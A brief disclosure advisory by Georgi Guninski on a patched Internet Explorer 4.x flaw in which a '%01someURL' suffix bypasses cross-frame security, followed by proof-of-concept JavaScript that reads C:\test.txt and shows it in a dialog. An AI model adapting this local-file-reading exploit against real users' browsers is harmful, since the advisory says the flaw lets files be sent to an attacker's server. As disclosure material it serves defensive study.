Guninski's IE 4 file reading bug.
http://www.geocities.com/ResearchTriangle/1711/read3.html


There is a bug in Internet Explorer 4.x (patched) which allows reading local files and sending them to an arbitrary server.

The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'.

This circumvents "Cross-frame security" and opens several security holes.


The filename must be known.

The bug may be exploited using HTML mail message. The exploit uses Javascript. 
For more info see the source.

Workaround: Disable Javascript.

Written by http://www.geocities.com/ResearchTriangle/1711 - Georgi Guninski


Exploit Code
------------
<SCRIPT>

alert('Create a short file C:\\test.txt and its contents will be shown in a dialog box.')
b=showModalDialog("about:<SCRIPT>a=window.open('file://c:/test.txt');s='Here is your file: \\n\\n'+a.document.body.innerText;alert(s);a.close();close()</"+"SCRIPT>%01file://c:/");

</SCRIPT>